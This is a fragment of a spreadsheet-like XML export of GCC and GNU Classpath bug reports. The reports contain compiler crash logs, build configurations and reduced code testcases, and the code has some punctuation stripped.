Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccaY0ov7.out file please attach this to your bugreport.
make[1]: *** [leveldb_blockchain.lo] Error 1
make[1]: Leaving directory `/home/genjix/src/libbitcoin/src'
make: *** [install-recursive] Error 1</t>
  </si>
  <si>
    <t>zgenjix</t>
  </si>
  <si>
    <t>GCC-15504</t>
  </si>
  <si>
    <t>ICE in final_scan_insn</t>
  </si>
  <si>
    <t>I receive an ICE from gfortran: 
$ gcc/bin/gfortran --version 
GNU Fortran 95 (GCC 3.5.0 20040517 (experimental)) 
/home/eschnett/gcc/bin/gfortran -march=pentium4 -malign-double 
-m128bit-long-double -ftrapv -g3 -Wall -c -o $current_wd/D3_extract.F.o 
$current_wd/D3_extract.f 
/home/eschnett/Calpha/Cactus/configs/einstein-gcc-debug/build/Extract/D3_extract.f: 
In function `d3_extract': 
/home/eschnett/Calpha/Cactus/configs/einstein-gcc-debug/build/Extract/D3_extract.f:-11: 
internal compiler error: in final_scan_insn at final.c:1848 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
I will attach the source code files.</t>
  </si>
  <si>
    <t>GCC-41548</t>
  </si>
  <si>
    <t>ICE: tree code 'lang_type' is not supported in gimple streams</t>
  </si>
  <si>
    <t>class DataArray {
    int max() const    { }
}
template  
class DataHashTable {
    template 
        class Element    { }
    typedef Element Elem
    DataArray m_elem
}
class Name    { }
class NameSet {
    DataHashTable  hashtab
}
NameSet p
./g++ -B. -nostdlib -fPIC -shared spxgeneralsm.3.2.ii -flto 
spxgeneralsm.3.2.ii:15:10: internal compiler error: tree code 'lang_type' is not supported in gimple streams</t>
  </si>
  <si>
    <t>GCC-55396</t>
  </si>
  <si>
    <t>-O2 -m32 -fno-omit-frame-pointer: internal compiler error: in check_rtl at lra.c:2007</t>
  </si>
  <si>
    <t>Created attachment 28736
pre-processed file
Compiling the linux kernel ends with:
|kernel/sched/core.c: In function '__schedule':
|kernel/sched/core.c:2891:1: internal compiler error: in check_rtl at lra.c:2007
| }
| ^
While removing Compiler options the ICE goes away if one of the following options 
is removed: -O2 -m32 -fno-omit-frame-pointer
gcc -v says:
Using built-in specs.
COLLECT_GCC=/usr/lib/gcc-snapshot/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 20121116-1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --enable-shared --enable-linker-build-id --with-system-zlib --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-snap/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-snap --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-snap --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64 --with-tune=generic --disable-werror --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.0 20121116 (experimental) [trunk revision 193562] (Debian 20121116-1)</t>
  </si>
  <si>
    <t>GCC-13236</t>
  </si>
  <si>
    <t>[tree-ssa] Internal compiler error: in add_may_alias</t>
  </si>
  <si>
    <t>When compiling some lapack files with gfortran I'm getting the following:  
$ gfortran -O2 -xf95 -c sgesvd.f 
sgesvd.f: In function `sgesvd': 
sgesvd.f:0: internal compiler error: in add_may_alias at tree-dfa.c:2233 
I haven't manged to reduce it down to a simple testcase. Cut-down versions of 
the routine don't seem to trip over the same error. I haven't been abot to 
identify any particular characteristics that trigger the big sorry! 
The relevant section of tree-dfa.c is: 
add_may_alias (tree var tree alias)  
{  
  size_t i  
  var_ann_t v_ann = get_var_ann (var)  
  var_ann_t a_ann = get_var_ann (alias)  
#if defined ENABLE_CHECKING  
  if (var == alias)  
    abort ()  
#endif</t>
  </si>
  <si>
    <t>pbrook</t>
  </si>
  <si>
    <t>GCC-59247</t>
  </si>
  <si>
    <t>[4.9 Regression] Bootstrap fails due to errors in libstdc++ sources with `--enable-symvers=gnu-versioned-namespace'</t>
  </si>
  <si>
    <t>I have come across errors in stage 1 build of libstdc++ when trying to build GCC 4.9-20131117 with the following commands on an x86_64-unknown-linux-gnu machine:
  $ $SRCDIR/configure --enable-languages=cc++ --enable-symvers=gnu-versioned-namespace
  $ make
Bootstrap succeeds when `--enable-symvers=gnu-versioned-namespace' is unset.
GCC 4.7-20131116 and 4.8-20131107 can be built successfully with the option thus this seems a regression.</t>
  </si>
  <si>
    <t>GCC-27884</t>
  </si>
  <si>
    <t>[4.1 regression] bogus error: invalid use of 'register' in linkage specification</t>
  </si>
  <si>
    <t>Between 20060508 and 20060530 gcc 4.2 changed to now longer allow the following code.  This error seems bogus to me.
(sid)3733:tbm@test: ~] cat test.cc
extern C void foo(register int *my_perl)
(sid)3734:tbm@test: ~] c++ -c test.cc
test.cc:1: error: invalid use of 'register' in linkage specification
zsh: exit 1     c++ -c test.cc
(sid)3735:tbm@test: ~]</t>
  </si>
  <si>
    <t>GCC-4860</t>
  </si>
  <si>
    <t>[ARM 3.0] sjlj_mark_call_sites thwarted by load-multi</t>
  </si>
  <si>
    <t xml:space="preserve">	
When compiling the file showbug.cpp (included below) with an ARM cross compiler on an i686-pc-linux build machine the compiler generates an Internal compiler error as follows:
---------------start of compiler output
arm-linux-g++ -v -save-temps -D_GNU_SOURCE -Wall -o showbug showbug.cpp
Reading specs from /home/kevin/projs/li6400/tools/lib/gcc-lib/arm-linux/3.0.3/specs
Configured with: ../configure --target=arm-linux --with-cpu=strongarm110 --prefix=/home/kevin/projs/li6400/tools --enable-languages=c++ --enable-threads --with-gxx-include-dir=/home/kevin/projs/li6400/tools/arm-linux/include/g++-v3 --disable-shared : (reconfigured)
Thread model: posix
gcc version 3.0.3 20011112 (prerelease)
 /home/kevin/projs/li6400/tools/lib/gcc-lib/arm-linux/3.0.3/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=3 -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__ELF__ -D__unix -D__linux -Asystem=unix -Asystem=posix -Acpu=arm -Amachine=arm -D__CHAR_UNSIGNED__ -D__NO_INLINE__ -D__STDC_HOSTED__=1 -Wall -D__ARM_ARCH_4__ -D__APCS_32__ -D__ARMEL__ -D__arm__ -D_GNU_SOURCE showbug.cpp showbug.ii
GNU CPP version 3.0.3 20011112 (prerelease) (cpplib) (ARM GNU/Linux with ELF)
ignoring nonexistent directory /home/kevin/projs/li6400/tools/arm-linux/sys-include
#include ... search starts here:
#include  search starts here:
 /home/kevin/projs/li6400/tools/arm-linux/include/g++-v3
 /home/kevin/projs/li6400/tools/arm-linux/include/g++-v3/arm-linux
 /home/kevin/projs/li6400/tools/arm-linux/include/g++-v3/backward
 /home/kevin/projs/li6400/tools/include
 /home/kevin/projs/li6400/tools/lib/gcc-lib/arm-linux/3.0.3/include
 /home/kevin/projs/li6400/tools/arm-linux/include
End of search list.
 /home/kevin/projs/li6400/tools/lib/gcc-lib/arm-linux/3.0.3/cc1plus -fpreprocessed showbug.ii -quiet -dumpbase showbug.cpp -Wall -version -o showbug.s
GNU CPP version 3.0.3 20011112 (prerelease) (cpplib) (ARM GNU/Linux with ELF)
GNU C++ version 3.0.3 20011112 (prerelease) (arm-linux)
        compiled by GNU C version 3.0.2.
showbug.cpp: In member function `void ADGroupDefs::print()':
showbug.cpp:69: Internal compiler error in sjlj_mark_call_sites at except.c:
   2137
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
---------------------end of compiler output
The error also occurs in the release versions of gcc 3.0.1 and 3.0.2. This error is NOT generated with the latest CVS gcc (3.1 20011112 (experimental)). The error also does NOT occur with a native i386 gcc (any version).
It appears that the exception cleanup code is not handling the temporary object of type __PrintGroupNum in ADGroupDefs::print(). The 3 int member variables dummy1 dummy2 and dummy3 in __PrintGroupNum are necessary to cause the error.
Release:
3.0.3 20011112 (prerelease)
Environment:
System: Linux bert.licor.com 2.4.9-6 #1 Thu Oct 18 09:39:55 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: arm-unknown-linux-gnu
configured with: ../configure --target=arm-linux --with-cpu=strongarm110 --prefix=/home/kevin/projs/li6400/tools --enable-languages=c++ --enable-threads --with-gxx-include-dir=/home/kevin/projs/li6400/tools/arm-linux/include/g++-v3 --disable-shared
How-To-Repeat:
Compile showbug.cpp with the following command line:
arm-linux-g++ -v -save-temps -D_GNU_SOURCE -Wall -o showbug showbug.cpp
showbug.cpp is as follows:
//-----------------begin of showbug.cpp
#include 
#include 
#include 
struct ADGroupDef
{
    ADGroupDef(int n) : _num(n) {}
    int _num
}
class ADGroupDefs
{
public:
    void add(ADGroupDef * __def) 
	{ _groups.push_back(__def) }
    void print()
    template
    void forEachGroup(Function f)
private:
    std::list _groups
    template
    class __ForEachGroup
    {
    public:
	Function f
	__ForEachGroup(Function __f)
	    : f(__f) {}
	void operator ()(ADGroupDef * __def)
	    {
		f(__def-&gt;_num)
	    }
    }
}
template
void ADGroupDefs::forEachGroup(Function f)
{
    std::for_each(_groups.begin()
		  _groups.end()
		  __ForEachGroup(f))
}
class __PrintGroupNum
{
public:
    int dummy1
    int dummy2
    int dummy3
    void operator ()(int n)
}
void __PrintGroupNum::operator ()(int n)
{
    std::cout &lt;&lt; n &lt;&lt; std::endl
}
static int var
void ADGroupDefs::print()
{
    if ( var )
	throw std::runtime_error(var is true)
    forEachGroup(__PrintGroupNum())
}
int main()
{
    ADGroupDefs defs
    defs.add(new ADGroupDef(1))
    defs.add(new ADGroupDef(2))
    defs.add(new ADGroupDef(3))
    defs.print()
    return 0
}
//--------------end of showbug.cpp
showbug.ii.gz is attached below (gzipped and uuencoded):</t>
  </si>
  <si>
    <t>kediger</t>
  </si>
  <si>
    <t>CLASSPATH-22997</t>
  </si>
  <si>
    <t>Ignored BigInteger method return values in java.awt.image.IndexColorModel</t>
  </si>
  <si>
    <t xml:space="preserve">In classpath-0.15:
In the isValid() method of the java.awt.image.IndexColorModel class
the setBit() and subtract() methods are called on a
BitInteger (lines 469 and 470).  However the return values
are not captured meaning these method calls have no effect
(because BigIntegers are immutable).
Found by FindBugs: http://findbugs.sourceforge.net
</t>
  </si>
  <si>
    <t>GCC-81987</t>
  </si>
  <si>
    <t>[8 Regression] ICE in verify_ssa with -O3 -march=skylake-avx512</t>
  </si>
  <si>
    <t>g++ -O3 -march=skylake-avx512 fails with ICE in verify_ssa with error: definition in block 11 does not dominate use in block 2
There are several trackers with the same error message but some of them fails only with -O2 -floop-nest-optimize option (69675 79483) other were fixed (71252). So i don't know if this bug is duplicate or not.
&gt;$ cat repr.cpp
extern short var_1
extern const short var_3
extern unsigned long int var_9
extern short var_13
extern const unsigned long int var_15
extern const unsigned long int var_37
extern unsigned long int var_40
extern long long int var_47
extern short var_48
extern const short var_54
extern long long int var_79
extern long long int var_81
extern long long int var_94
extern long long int var_95
extern long long int var_701
extern unsigned long int var_786
extern short var_788
extern long long int var_844
struct struct_1 {
    short member_1_2 : 30
    static long long int member_1_3
}
extern struct_1 struct_obj_6
extern struct_1 struct_obj_8
void foo() {
  int a = var_3 &lt;= 602154393864UL
  if (var_81 ? 0 : var_3 &amp;&amp; var_9)
  else {
    var_94 = 0
    if (var_3 &amp;&amp; var_48 || var_13) {
      if (var_48)
        var_95 = 0
      short b((2364461588881776511UL + var_3) * (2 ? var_13 : 0) || var_1)
      struct_obj_8.member_1_2 = b
      if (var_15) {
        if (var_81)
          if (var_47)
          else if (var_40)
            var_701 = 0
      } else {
        if (var_40)
          var_79 = 0
        if (var_54) {
          if (var_37)
            var_786 = 0
          else
            var_788 = 0
          struct_obj_6.member_1_3 =
              (2364461588881776511UL + var_3) * (2 ? var_13 : 0)
        }
      }
      if ((2364461588881776511UL + var_3) * (2 ? var_13 : 0))
        var_844 = 0
    }
  }
}
Error:
&gt;g++ -O3 -march=skylake-avx512 -c repr.cpp
repr.cpp: In function â€˜void foo()â€™:
repr.cpp:28:6: error: definition in block 11 does not dominate use in block 2
 void foo() {
      ^~~
for SSA_NAME: _10 in statement:
slsr_104 = _10 * 2364461588881776511
during GIMPLE pass: slsr
repr.cpp:28:6: internal compiler error: verify_ssa failed
0x1095c1b verify_ssa(bool bool)
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/tree-ssa.c:1188
0xd7ad1d execute_function_todo
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/passes.c:1999
0xd7b619 execute_todo
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/passes.c:2046
GCC version is 251301</t>
  </si>
  <si>
    <t>GCC-66720</t>
  </si>
  <si>
    <t>gcc.dg/vect/pr48052.c FAILs</t>
  </si>
  <si>
    <t>The new gcc.dg/vect/pr48052.c test FAILs on Solaris/SPARC:
FAIL: gcc.dg/vect/pr48052.c -flto -ffat-lto-objects  scan-tree-dump-times vect vectorized 1 loops 2
FAIL: gcc.dg/vect/pr48052.c scan-tree-dump-times vect vectorized 1 loops 2
both for 32 and 64-bit.
I'm attaching the dump.
  Rainer</t>
  </si>
  <si>
    <t>GCC-34965</t>
  </si>
  <si>
    <t>[4.2 regression] Broken diagnostic: 'truth_and_expr' not supported by dump_expr</t>
  </si>
  <si>
    <t>A broken diagnostic is issued for the following invalid code snippet
since GCC 3.4.0 but only when compiled with -O or higher:
========================
int foo(int)
void bar(int i int j)
{
  foo(i 
}
========================
bug.cc: In function 'void bar(int int)':
bug.cc:5: error: 'foo(((int)#'truth_and_expr' not supported by dump_expr#))' cannot be used as a function</t>
  </si>
  <si>
    <t>GCC-61672</t>
  </si>
  <si>
    <t>[4.9 Regression] Less redundant instructions deleted by pre_delete after r208113.</t>
  </si>
  <si>
    <t>In real application which is compiled with restrictions on frame size after r208113 number of deleted redundant instruction decreased significantly:
3744  vs 247 and we assume that this is the reason of frame size increasing.
I reproduced this regression using gcc/testsuite/g++.dg/torture/pr58464 for which we have 8(before fix) vs 4.
r208113 | rguenth | 2014-02-25 12:59:10 +0400 (Tue 25 Feb 2014) | 10 lines
Changed paths:
 M /trunk/gcc/ChangeLog
 M /trunk/gcc/emit-rtl.c
2014-02-25 Richard Biener 
PR middle-end/60291 â€¢emit-rtl.c (mem_attrs_htab): Remove.
 (mem_attrs_htab_hash): Likewise.
 (mem_attrs_htab_eq): Likewise.
 (set_mem_attrs): Always allocate new mem-attrs when something
 changed.
 (init_emit_once): Do not allocate mem_attrs_htab.</t>
  </si>
  <si>
    <t>GCC-14534</t>
  </si>
  <si>
    <t>Unrecognizing static function as a template parameter when its return value is also templated</t>
  </si>
  <si>
    <t>avr-gcc.EXE (GCC) 3.3.1
Reading specs from C:\WinAVR\bin\..\lib\gcc-lib\avr\3.3.1\specs
Configured with: ../configure --prefix=/e/avrdev/install --target=avr --enable-
languages=cc++ --disable-nls --enable-win32-registry=WinAVR
Thread model: single
gcc version 3.3.1
mingw32-gcc.EXE (GCC) 3.2 (mingw special 20020817-1)
Reading specs from c:/mingw/bin/../lib/gcc-lib/mingw32/3.2/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --
host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --
enable-languages=f77c++objcada --disable-win32-registry --disable-shared
Thread model: win32
gcc version 3.2 (mingw special 20020817-1)
&gt; avr-gcc test.cpp
test.cpp:10: error: invalid use of undefined type `class Boo'
test.cpp:6: error: forward declaration of `class Boo'
test.cpp:10: error: template argument 2 is invalid
test.cpp:10: error: ISO C++ forbids declaration of `far_type' with no type
test.cpp: -------------------------
template 
class Far {}
class Boo
{
public:
	static int some()
	typedef Far far_type // error
}
int main()
{
}
----------------------------------
BUT this file will be compiled successfully
test.cpp: -------------------------
template 
class Far {}
class Boo
{
public:
	static int some()
	typedef Far far_type // ok (explicit scope specifier)
}
int main()
{
}
----------------------------------</t>
  </si>
  <si>
    <t>sato</t>
  </si>
  <si>
    <t>GCC-21245</t>
  </si>
  <si>
    <t>gcjh creates invalid/empty header files</t>
  </si>
  <si>
    <t>While trying to adapt a patch from GNU classpath to libgcj I found that gcjh  
was failing to build a CNI header from a class file. I accidently deleted my  
terminal and lost the command output. So I tried again and the bug seemed to  
have vanished. After some investigation I found the following:  
gcjh prints this error gcjh: static field has same name as method (see 
attached testcase) and produces a header file which looks okay. This file 
contains buggy C++ code because it contains a static variable and a static 
method with the same name. Make then saw the buggy header file and saw its 
done do the next step. 
gcjh should bail out for real and not generate a buggy output file.</t>
  </si>
  <si>
    <t>GCC-508</t>
  </si>
  <si>
    <t>ICE on unusualÂ´ template use</t>
  </si>
  <si>
    <t>gcc ices during template instantiation of an operator
when two (or more) template parameters are present
and template parameter m is of type provided by
parameter n (n &lt; m). Source code is
//---
template  struct A {}
template  void operator const &amp; o) {}
int main()
{ 
        A a
        operator(0a) 
}
//---
Release:
unknown
Environment:
gcc version 2.95.2 19991024 (release)
FreeBSD
How-To-Repeat:
try to compile the above source</t>
  </si>
  <si>
    <t>tanis</t>
  </si>
  <si>
    <t>GCC-27732</t>
  </si>
  <si>
    <t>[4.0 Regression] Parentheses elicit spurious error: missing '&gt;' to terminate the template argument list</t>
  </si>
  <si>
    <t>I get spurious errors from g++ in the following cases: 
// case 1:
int m
template struct A { }
template struct A&lt;
// case 2:
int m
template struct A { }
template struct A&lt;(
Just a guess:  is there something about the parse of '(' that gums up the works?</t>
  </si>
  <si>
    <t>widman</t>
  </si>
  <si>
    <t>GCC-82436</t>
  </si>
  <si>
    <t>[7 Regression] 465.tonto ICE in vect_get_slp_vect_defs at tree-vect-slp.c:3410</t>
  </si>
  <si>
    <t>With -Ofast -march=core-avx2 -flto -m32.
We are vectorizing
     do n=1n_refl
       y = y + abs(F_z_(ext_refs(n)))
       w = w + abs(F_r_(ext_refs(n)))
     end do
from put_fcalc_plots which looks like the following before vectorization:
 [84.24%] [count: INV]:
# _649 = PHI 
# y_lsm.44_396 = PHI 
# w_lsm.45_24 = PHI 
_104 = _103 * _649
_105 = _102 + _104
_107 = _105 * _106
_108 = (sizetype) _107
_109 = _101 + _108
_651 = MEM[(struct reflection_type 
_652 = MEM[(struct reflection_type 
_653 = _651 - _652
_655 = MEM[(struct reflection_type 
res_656 = _653 / _655
_111 = ABS_EXPR 
_113 = _111 + y_lsm.44_396
res_648 = _653 / _652
_115 = ABS_EXPR 
_117 = _115 + w_lsm.45_24
_118 = _649 + 1
if (_118 &gt; res_485)
  goto  [15.00%] [count: INV]
else
  goto  [85.00%] [count: INV]
 [71.60%] [count: INV]:
goto  [100.00%] [count: INV]
all types are doubles.  The reflection_type is
   type reflection_type
   INT :: h
   ! Miller h index for the reflection
   INT :: k
   ! Miller k index for the reflection
   INT :: l
   ! Miller l index for the reflection
   REAL :: F_exp
   ! Experimental structure factor
   REAL :: F_sigma
   ! Experimental error in the structure factor
   CPX :: F_calc
   ! Calculated complex structure factor without including corrections
   REAL :: F_pred
   ! Calculated structure factor including scale and extinction corrections
   REAL :: I_exp
   ! Experimental intensity
   REAL :: I_sigma
   ! Experimental error in the intensity
   REAL :: I_pred
   ! Calculated intensity including scale and extinction corrections
   end type
where INT is int32_t and CPX is _Complex double.</t>
  </si>
  <si>
    <t>GCC-79386</t>
  </si>
  <si>
    <t>[7 Regression] ICE: segmentation fault in cprop w/ -O2 on 32-bit BE powerpc</t>
  </si>
  <si>
    <t>At least gcc-7.0.0-alpha20170129 and gcc-7.0.0-alpha20170205 snapshots ICE when compiling the following snippet for 32-bit BE powerpc targets w/ -O2:
int fy er
int
ot (int dh)
{
  int t5
  int *ge *ys
  if (er == 0)
  {
    t5 = 0
    ys = 
    ge = 
  }
  else
  {
    int ay
    t5 = 1
    for (ay = 0 ay &lt; 9 ++ay)
      t5 *= 3
    ys = t5
    ge = 
  }
  *ys = t5 &lt; 3
  if (*ys != 0)
  {
    int sr
    er += (fy != 0) ? fy : 1
    if (sr != 0 || dh != 0)
      *ge = 0
    if (er &gt;= 0)
    {
      if (sr != 0)
        sr = dh
      if (*ge / sr != 0)
        for ()
        {
        }
    }
  }
  return er * (fy != 0 
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20170205 -O2 -w -c rxffdvao.c
rxffdvao.c: In function 'ot':
rxffdvao.c:46:1: internal compiler error: Segmentation fault
 }
 ^
0x2ed19bc7d19 crash_signal
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/toplev.c:333
0x2ed1a25f149 find_bypass_set
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/cprop.c:1474
0x2ed1a25f149 bypass_block
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/cprop.c:1597
0x2ed1a25f149 bypass_conditional_jumps
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/cprop.c:1731
0x2ed1a25f149 one_cprop_pass
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/cprop.c:1874
0x2ed1a25f149 execute_rtl_cprop
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/cprop.c:1918
0x2ed1a25f149 execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170205/work/gcc-7-20170205/gcc/cprop.c:1956</t>
  </si>
  <si>
    <t>CLASSPATH-22704</t>
  </si>
  <si>
    <t>java.awt.geom.RoundRectangle2D.intersects partially wrong</t>
  </si>
  <si>
    <t>The implementation of the intersects method in java.awt.geom.RoundRectangle2D sometimes returns the wrong values.
The attached Mauve test case succeeds on Sun J2SE 1.4.1_01 but fails on Classpath. I've just submitted this test case to mauve-patches@sources.redhat.com. The enclosed image (gnu/testlet/java/awt/geom/RoundRectangle2D/doc-files/intersects-1.png) illustrates the expected results.
For rectangles #10 11 12 16 20 23 27 30 34 38 39 and 40 the current classpath implementation returns false. However true would be the correct result.</t>
  </si>
  <si>
    <t>GCC-57431</t>
  </si>
  <si>
    <t>ICE in simplify_const_unary_operation vld1_dup_s64/vst1_s64</t>
  </si>
  <si>
    <t>Created attachment 30204
testcase
The attached program makes GCC crash when using -O1 -O2 or -O3. Compiles fine with -O0.
$ arm-none-linux-gnueabi-gcc -mcpu=cortex-a9 -mfloat-abi=softfp -mfpu=neon -O1 -c myref_vld1_dup.c
myref_vld1_dup.c: In function 'exec_vld1_dup':
myref_vld1_dup.c:16:1: internal compiler error: in simplify_const_unary_operation at simplify-rtx.c:1503
 }
 ^
0xa768aa simplify_const_unary_operation(rtx_code machine_mode rtx_def* machine_mode)
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/simplify-rtx.c:1503
0xa743b4 simplify_unary_operation(rtx_code machine_mode rtx_def* machine_mode)
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/simplify-rtx.c:791
0xffc467 fold_rtx
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/cse.c:3287
0xfff4d0 cse_insn
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/cse.c:4573
0x1004e2e cse_extended_basic_block
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/cse.c:6405
0x10053ca cse_main
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/cse.c:6583
0x10070b1 rest_of_handle_cse
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf/trunk/gcc/cse.c:7433</t>
  </si>
  <si>
    <t>christophe.lyon</t>
  </si>
  <si>
    <t>GCC-65242</t>
  </si>
  <si>
    <t>[5 Regression] ICE (in gen_add2_insn at optabs.c:4761) on powerpc64le-linux-gnu</t>
  </si>
  <si>
    <t>with r221042
$ g++ -c -g -O3 loadbi3.ii 
loadbi3.ii: In function 'void J::m_fn8()':
loadbi3.ii:91:1: internal compiler error: in gen_add2_insn at optabs.c:4761
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
$ cat loadbi3.ii
class A {
public:
  int m_fn1()
}
class B {
public:
  enum IOMode { reading }
}
class tn_file_buf_stream : B {
public:
  tn_file_buf_stream(IOMode)
  ~tn_file_buf_stream()
}
class C {
public:
  int 
}
class D {
public:
  bool m_fn2()
}
class F {
public:
  int m_fn3(D 
}
class G {
public:
  D bdt
}
class ObjectType {
public:
  int id
  D weather
  struct H {
    F terrainaccess
  }
  H m_fn4()
  struct {
    A images
  } weatherPicture[]
  ObjectType *m_fn5()
  int m_fn6()
} a
#pragma pack(1)
class I {}
class J {
  J(I *)
  I translationTableTMISSPart
  void m_fn8()
  tn_file_buf_stream *MissFile
  void m_fn9()
  virtual G *m_fn7(int int)
}
int b c d g
int e[5]
short f
void J::m_fn9() {
  int h
  C k
  for ( b) {
    int l = c n = c 
    for (int m d) {
      int o = 0
      for (int p = 0 p &lt; 2  p++)
        if (g)
          for (int i i &lt; a.m_fn6() i++) {
            ObjectType *q = a.m_fn5()
            for (int r = 0 r &lt; 6 r++)
              if (q-&gt;weather.m_fn2())
                for (int j j weatherPicture[r].images.m_fn1() j++)
                  if (e[m]) {
                    G *s = m_fn7(l n)
                    if (q-&gt;m_fn4().terrainaccess.m_fn3(s-&gt;bdt))
                      g = o = 1
                  }
          }
      k[h++] = f
    }
  }
}
void J::m_fn8() try {
  tn_file_buf_stream t(B::reading)
  MissFile = 
  m_fn9()
  J u(0)
  u.m_fn8()
}
catch (int) {
}</t>
  </si>
  <si>
    <t>GCC-10710</t>
  </si>
  <si>
    <t>ICE (segault) after error: non-template used as parameter</t>
  </si>
  <si>
    <t>This is another fallout from c++/10661 which needs 
reduction.
Release:
3.3 CVS 20030503
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>bajo</t>
  </si>
  <si>
    <t>GCC-63618</t>
  </si>
  <si>
    <t>CSE at IRA pass delete SET_GOT which is used later</t>
  </si>
  <si>
    <t>Test failed on execution compiled with:
gcc elim_set_got.c -fPIE -m32 -msse4.2 -O2 -fno-inline -mtune=corei7
./a.out
Segmentation fault (core dumped)
That occurs because CSE delete SET_GOT at IRA as it has no uses.
However the instruction:
(insn 20 17 21 3 (set (mem:TF (pre_dec:SI (reg/f:SI 7 sp)) [2  S16 A128])
        (const_double:TF 1.0e+9 [0x0.ee6b28p+30])) elim_setgot.c:26 121 {*pushtf} 
     (expr_list:REG_ARGS_SIZE (const_int 16 [0x10]) 
        (nil))) 
have hidden use of GOT register as it is split into:
(insn 45 47 46 3 (set (reg:SI 0 ax [92]) 
        (plus:SI (reg:SI 0 ax [87]) 
            (const:SI (unspec:SI [ 
                        (symbol_ref/u:SI (*.LC2) [flags 0x2]) 
                    ] UNSPEC_GOTOFF)))) elim_setgot.c:26 213 {*leasi} 
     (expr_list:REG_EQUAL (symbol_ref/u:SI (*.LC2) [flags 0x2]) 
        (nil))) 
(insn 46 45 20 3 (set (reg:TF 23 xmm2 [93]) 
        (mem/u/c:TF (reg:SI 0 ax [92]) [2  S16 A128])) elim_setgot.c:26 126 {*movtf_internal} 
     (nil))</t>
  </si>
  <si>
    <t>evstupac</t>
  </si>
  <si>
    <t>GCC-25070</t>
  </si>
  <si>
    <t>rank mismatch in subroutine call</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
INTEGER :: I(22)
I=RESHAPE((/1234/)(/22/))
CALL TST(I)
CONTAINS
 SUBROUTINE TST(I)
  INTEGER :: I(:)
  write(6*) I
 END SUBROUTINE TST
END</t>
  </si>
  <si>
    <t>GCC-64584</t>
  </si>
  <si>
    <t>basic_regex::assign breaks *this if it throws regex_error</t>
  </si>
  <si>
    <t>Created attachment 34436
g++ -v
Please see the following sample.
=============================== sample code ===============================
#include 
#include 
int main()
{
    std::regex re()
    std::cout &lt;&lt; re.flags() &lt;&lt; std::endl
    try {
        re.assign(( std::regex_constants::icase)
    } catch (const std::regex_error&amp; e) {
        std::cout &lt;&lt; e.code() &lt;&lt; std::endl
    }
    std::cout &lt;&lt; re.flags() &lt;&lt; std::endl
}
===========================================================================
================================= output ==================================
16
5
1
===========================================================================
cf. http://melpon.org/wandbox/permlink/tqxSS6MImnpsCGUf
The C++11 standard 28.8.3[re.regex.assign]/p.15 says If an exception is thrown *this is unchanged.
So I think that the output should be
================================= output ==================================
16
5
16
===========================================================================</t>
  </si>
  <si>
    <t>GCC-41177</t>
  </si>
  <si>
    <t>Wrong base-object checks for type-bound procedures</t>
  </si>
  <si>
    <t>ELEMENTAL type-bound procedures (and in consequence also for instance type-bound operators or assignments on arrays) do not work for non-scalar passed-objects (even though the procedures are ELEMENTAL):
MODULE m
  IMPLICIT NONE
  TYPE t
